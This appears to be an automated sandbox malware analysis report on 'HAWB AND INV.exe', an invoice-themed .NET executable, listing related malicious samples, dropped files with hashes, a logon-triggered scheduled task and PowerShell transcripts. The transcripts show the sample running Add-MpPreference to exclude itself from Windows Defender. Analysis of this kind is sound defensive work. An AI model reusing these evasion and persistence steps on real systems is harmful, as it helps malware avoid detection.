                                                                    • Excluded IPs from analysis (whitelisted): 13.88.21.125, 8.241.89.254, 8.238.29.254, 8.241.78.126, 8.238.29.126, 8.241.82.254, 40.88.32.150, 104.43.193.48, 13.64.90.137, 104.42.151.234, 20.50.102.62, 92.122.213.247, 92.122.213.249, 51.103.5.186, 52.155.217.156, 20.54.26.129, 40.64.100.89, 23.57.80.111
                                                                    • Excluded domains from analysis (whitelisted): mw1eap.displaycatalog.md.mp.microsoft.com.akadns.net, fg.download.windowsupdate.com.c.footprint.net, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, 2-01-3cf7-0009.cdx.cedexis.net, wu-fg-shim.trafficmanager.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, wns.notify.trafficmanager.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, consumerrp-displaycatalog-aks2eap-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, download.windowsupdate.com, displaycatalog-uswesteap.md.mp.microsoft.com.akadns.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    TimeTypeDescription
                                                                    14:52:21API Interceptor1x Sleep call for process: HAWB AND INV.exe modified
                                                                    14:53:05API Interceptor123x Sleep call for process: powershell.exe modified

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    202.254.234.15221AZZWCT.exeGet hashmaliciousBrowse
                                                                    • www.pantan-kobo.com/ol/?id=9T9Ti/oEbGV5XKb/DiI7+YlY2YrLu7Qh2NTby3V925jAJz0JnotPS3vF81WrTrt3b5ypKJfWDP5iksTuKzm8UQ==&tv=u4NhtX-XqfSpdX

                                                                    Domains

                                                                    No context

                                                                    ASN

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    AS-26496-GO-DADDY-COM-LLCUSInquiry 05042021.docGet hashmaliciousBrowse
                                                                    • 107.180.43.16
                                                                    don.exeGet hashmaliciousBrowse
                                                                    • 184.168.131.241
                                                                    Comand#U0103 de achizi#U021bie PP050321.exeGet hashmaliciousBrowse
                                                                    • 184.168.131.241
                                                                    O1E623TjjW.exeGet hashmaliciousBrowse
                                                                    • 184.168.131.241
                                                                    product specification.xlsxGet hashmaliciousBrowse
                                                                    • 184.168.131.241
                                                                    9DWvynenEDJ11fY.exeGet hashmaliciousBrowse
                                                                    • 184.168.131.241
                                                                    PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                                    • 184.168.131.241
                                                                    ETC-B72-LT-0149-03-AR.exeGet hashmaliciousBrowse
                                                                    • 184.168.131.241
                                                                    SecuriteInfo.com.Heur.3869.xlsGet hashmaliciousBrowse
                                                                    • 192.186.217.35
                                                                    SecuriteInfo.com.Heur.3869.xlsGet hashmaliciousBrowse
                                                                    • 192.186.217.35
                                                                    SecuriteInfo.com.Heur.12433.xlsGet hashmaliciousBrowse
                                                                    • 192.186.217.35
                                                                    SecuriteInfo.com.Heur.12433.xlsGet hashmaliciousBrowse
                                                                    • 192.186.217.35
                                                                    Documents_1906038956_974385067.xlsGet hashmaliciousBrowse
                                                                    • 192.186.217.35
                                                                    Documents_1906038956_974385067.xlsGet hashmaliciousBrowse
                                                                    • 192.186.217.35
                                                                    Bill Of Lading & Packing List.pdf.gz.exeGet hashmaliciousBrowse
                                                                    • 107.180.44.132
                                                                    SecuriteInfo.com.Heur.3421.xlsGet hashmaliciousBrowse
                                                                    • 192.186.217.35
                                                                    SecuriteInfo.com.Heur.3421.xlsGet hashmaliciousBrowse
                                                                    • 192.186.217.35
                                                                    Xerox Scan_07122020181109.exeGet hashmaliciousBrowse
                                                                    • 50.62.160.30
                                                                    94a5cd81_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                    • 192.186.217.35
                                                                    Documents_585904356_2104184844.xlsGet hashmaliciousBrowse
                                                                    • 192.186.217.35
                                                                    ASDETUKhttpwwwheficedcomGBb8768PLUW1.exeGet hashmaliciousBrowse
                                                                    • 45.150.67.141
                                                                    z3hir.x86Get hashmaliciousBrowse
                                                                    • 45.10.156.162
                                                                    BVN1eAAgfj.exeGet hashmaliciousBrowse
                                                                    • 45.150.67.203
                                                                    Document_1097567093_03242021_Copy.xlsmGet hashmaliciousBrowse
                                                                    • 45.150.67.23
                                                                    Document_1097567093_03242021_Copy.xlsmGet hashmaliciousBrowse
                                                                    • 45.150.67.23
                                                                    efaxCanberraearlylearning_633.htmGet hashmaliciousBrowse
                                                                    • 191.101.50.240
                                                                    7728839942-04012021.xlsmGet hashmaliciousBrowse
                                                                    • 45.150.67.244
                                                                    7728839942-04012021.xlsmGet hashmaliciousBrowse
                                                                    • 45.150.67.244
                                                                    7728839942-04012021.xlsmGet hashmaliciousBrowse
                                                                    • 45.150.67.244
                                                                    9642351931-04012021.xlsmGet hashmaliciousBrowse
                                                                    • 45.150.67.243
                                                                    91844756223-04012021.xlsmGet hashmaliciousBrowse
                                                                    • 45.150.67.243
                                                                    9497306271-04012021.xlsmGet hashmaliciousBrowse
                                                                    • 45.150.67.243
                                                                    7122681326-04012021.xlsmGet hashmaliciousBrowse
                                                                    • 45.150.67.244
                                                                    9497306271-04012021.xlsmGet hashmaliciousBrowse
                                                                    • 45.150.67.243
                                                                    9497306271-04012021.xlsmGet hashmaliciousBrowse
                                                                    • 45.150.67.243
                                                                    91237434194-04012021.xlsmGet hashmaliciousBrowse
                                                                    • 45.150.67.243
                                                                    71559035622-04012021.xlsmGet hashmaliciousBrowse
                                                                    • 45.150.67.244
                                                                    91237434194-04012021.xlsmGet hashmaliciousBrowse
                                                                    • 45.150.67.243
                                                                    91237434194-04012021.xlsmGet hashmaliciousBrowse
                                                                    • 45.150.67.243
                                                                    91408811036-04012021.xlsmGet hashmaliciousBrowse
                                                                    • 45.150.67.243

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HAWB AND INV.exe.log
                                                                    Process:C:\Users\user\Desktop\HAWB AND INV.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:modified
                                                                    Size (bytes):1406
                                                                    Entropy (8bit):5.341099307467139
                                                                    Encrypted:false
                                                                    SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmER:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHg
                                                                    MD5:E5FA1A53BA6D70E18192AF6AF7CFDBFA
                                                                    SHA1:1C076481F11366751B8DA795C98A54DE8D1D82D5
                                                                    SHA-256:1D7BAA6D3EB5A504FD4652BC01A0864DEE898D35D9E29D03EB4A60B0D6405D83
                                                                    SHA-512:77850814E24DB48E3DDF9DF5B6A8110EE1A823BAABA800F89CD353EAC7F72E48B13F3F4A4DC8E5F0FAA707A7F14ED90577CF1CB106A0422F0BEDD1EFD2E940E4
                                                                    Malicious:true
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):14734
                                                                    Entropy (8bit):4.993014478972177
                                                                    Encrypted:false
                                                                    SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
                                                                    MD5:8D5E194411E038C060288366D6766D3D
                                                                    SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
                                                                    SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
                                                                    SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
                                                                    Malicious:false
                                                                    Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):22300
                                                                    Entropy (8bit):5.601959909768602
                                                                    Encrypted:false
                                                                    SSDEEP:384:+tCDX0FD4MBB30CCancSBKn+ultIo867Y9gpSJUeRq1BMrmihZOAV7WTQyb64I+i:3MBB3tc4K+ultp8+pXepthTS/g
                                                                    MD5:241BCBB5F7AD903FBBCC8E06DD3DBEA8
                                                                    SHA1:96CF72B66B02F0D23AAADC975EA8433CA6B12497
                                                                    SHA-256:CAF362C288605DAB596260E52669FDC3515FEF5913EEB1ABF18AAB976098B2FA
                                                                    SHA-512:4557A6D914573A8EB8172289153D159FCB3856674E93ACC1DA0A9968175CCBC94ACC40B678A595FB639F6F4F28EBD19395DEBD4EC2DBADB94365B5C063A56E52
                                                                    Malicious:false
                                                                    Preview: @...e.................................<.4............@..........H...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_452t2rgn.y0w.psm1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview: 1
                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ci5ca1ps.eac.psm1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview: 1
                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kktv134m.r1n.ps1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview: 1
                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o4og0hre.avf.ps1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview: 1
                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qa3iixpe.2p0.ps1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview: 1
                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_whb0pjwq.qxr.psm1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview: 1
                                                                    C:\Users\user\AppData\Local\Temp\tmp9D41.tmp
                                                                    Process:C:\Users\user\Desktop\HAWB AND INV.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1656
                                                                    Entropy (8bit):5.16428555186853
                                                                    Encrypted:false
                                                                    SSDEEP:24:2dH4+SEqC/S7h2ulNMFp2O/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB3Jtn:cbha7JlNQV/rydbz9I3YODOLNdq31
                                                                    MD5:04A6B80210066CDF78CC777D7077AC7B
                                                                    SHA1:DC1B95866C360381A716ED386EA0FF326052D00E
                                                                    SHA-256:EA7625AEF7C946221703A7714B8353E6AF13EA601AFDCC9DCA2410DF46AF1B12
                                                                    SHA-512:E4B574E3E660E59CCC510644669909A1C2FF0C3B1EA32BB3F7580144A3240D80AE2E8D587CDA9ADA7B25B5364B7B5E9601479660211094C732F744899A6E1B44
                                                                    Malicious:true
                                                                    Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvail
                                                                    C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe
                                                                    Process:C:\Users\user\Desktop\HAWB AND INV.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):741376
                                                                    Entropy (8bit):7.926075846118889
                                                                    Encrypted:false
                                                                    SSDEEP:12288:vFAPrYNczrMFJxdNkJ41cx7acIXBFwbk2ldYaZPCwdwfPyfK8vW6M+:vFAjYysyCcGTqnCfPwK8vnt
                                                                    MD5:42662765A94CE5ECE11529509F937711
                                                                    SHA1:DA57DD4C137C47FC9B906CAAF067C6ED13FA2DA6
                                                                    SHA-256:2138325DD5E2825EE4086187A944AF336476B0327E1DDAE7563BB24523836E08
                                                                    SHA-512:101D7BB5F778E779133F005C801FA26CF1BC147FED9F2774808526C50B3AE8E12863BC7EE3DFB060153D4B0B3A5EF66F357E44D477E1558060FE54DF990B4B95
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 21%
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P..<..........~[... ...`....@.. ....................................@.................................,[..O....`............................................................................... ............... ..H............text....;... ...<.................. ..`.rsrc........`.......>..............@..@.reloc...............N..............@..B................`[......H...........P...........\....<...........................................0............(!...(".........(.....o#....*.....................($......(%......(&......('......((....*N..(....o`...()....*&..(*....*.s+........s,........s-........s.........s/........*....0...........~....o0....+..*.0...........~....o1....+..*.0...........~....o2....+..*.0...........~....o3....+..*.0...........~....o4....+..*.0..<........~.....(5.....,!r...p.....(6...o7...s8............~.....+..*.0......
                                                                    C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe:Zone.Identifier
                                                                    Process:C:\Users\user\Desktop\HAWB AND INV.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:false
                                                                    Preview: [ZoneTransfer]....ZoneId=0
                                                                    C:\Users\user\Documents\20210503\PowerShell_transcript.760639.DjF4q4v1.20210503145231.txt
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):5823
                                                                    Entropy (8bit):5.383418810910059
                                                                    Encrypted:false
                                                                    SSDEEP:96:BZmTL7NmqDo1ZFZVTL7NmqDo1Z268ijZ5TL7NmqDo1ZlTyyOZp:I
                                                                    MD5:93129E478DEEEC2478437A8363A38EA4
                                                                    SHA1:A1D28FA135CCBA1843AAF0CD815C7F13D23D11CE
                                                                    SHA-256:F2DC8F1B35EDB24FAC6D6FF9FA7098630095C73D6AF50E266403E5F7067259B4
                                                                    SHA-512:69FB157B4DF97B16645CE833E992122FEF2B1F6881BB090DB904236279E6614B85C39D8962424EB9C33EF2D3FBF242322AA997B7762824BCB5DB82EF99B46BF4
                                                                    Malicious:false
                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210503145256..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 760639 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe..Process ID: 4592..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210503145257..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe..**********************..Windows PowerShell transcript start..Start time: 20210503145745..Username: computer\user..RunAs User: DES
                                                                    C:\Users\user\Documents\20210503\PowerShell_transcript.760639.TlWWST52.20210503145228.txt
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):5823
                                                                    Entropy (8bit):5.376422136318294
                                                                    Encrypted:false
                                                                    SSDEEP:96:BZxTL7NJqDo1ZYZBTL7NJqDo1Zz68ijZNTL7NJqDo1ZFTyylZe:S
                                                                    MD5:5494E173E7978530BD8CE47B4FFD2F6F
                                                                    SHA1:98537F033C26E27190C1140D5F81C30D4B9BA46F
                                                                    SHA-256:583B8CDC55F3E5604E9455BC869C28E0A27C53D1269DB84AFC380E033E0F0F23
                                                                    SHA-512:54F090846A3633B2DAA570A0619DDA278C3CF77518123EC11AB558903A07BE3119D862E994FE3161DEC45B62FBE6E7EEB19875BE48FF43BB4E60ADA21C9C7B0A
                                                                    Malicious:false
                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210503145253..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 760639 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe..Process ID: 7020..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210503145254..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe..**********************..Windows PowerShell transcript start..Start time: 20210503150325..Username: computer\user..RunAs User: DES
                                                                    C:\Users\user\Documents\20210503\PowerShell_transcript.760639.loHpl5Ui.20210503145226.txt
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):3488
                                                                    Entropy (8bit):5.3223569299956495
                                                                    Encrypted:false
                                                                    SSDEEP:96:BZNTL7NAqDo1ZG2ZRTL7NAqDo1ZGqaf0cf0cf03Zw:6rrR
                                                                    MD5:223BAC110AB9E04C3C2F1CE42C060EB9
                                                                    SHA1:0B87633A2276344A3CBE4542D80CDA52E0C40656
                                                                    SHA-256:DDA355E36125BD1DFEE7FE3280BE85A0DBA31EB7048D1637856DF32BF9907223
                                                                    SHA-512:688672FDB2F5F64CEF935D12795C633CA3B93EF800AD8ED2E4529A5C8600FC7A239AEF085B9DB8E3743FB49FEC59DC92CCC29AAF51E1C734C9646176DC7E86F1
                                                                    Malicious:false
                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210503145248..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 760639 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\HAWB AND INV.exe..Process ID: 6932..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210503145249..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\HAWB AND INV.exe..**********************..Command start time: 20210503145543..**********************..PS>TerminatingError(Add-MpPreference): "A positional parameter cannot

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):7.926075846118889
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    File name:HAWB AND INV.exe
                                                                    File size:741376
                                                                    MD5:42662765a94ce5ece11529509f937711
                                                                    SHA1:da57dd4c137c47fc9b906caaf067c6ed13fa2da6
                                                                    SHA256:2138325dd5e2825ee4086187a944af336476b0327e1ddae7563bb24523836e08
                                                                    SHA512:101d7bb5f778e779133f005c801fa26cf1bc147fed9f2774808526c50b3ae8e12863bc7ee3dfb060153d4b0b3a5ef66f357e44d477e1558060fe54df990b4b95
                                                                    SSDEEP:12288:vFAPrYNczrMFJxdNkJ41cx7acIXBFwbk2ldYaZPCwdwfPyfK8vW6M+:vFAjYysyCcGTqnCfPwK8vnt
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P..<..........~[... ...`....@.. ....................................@................................

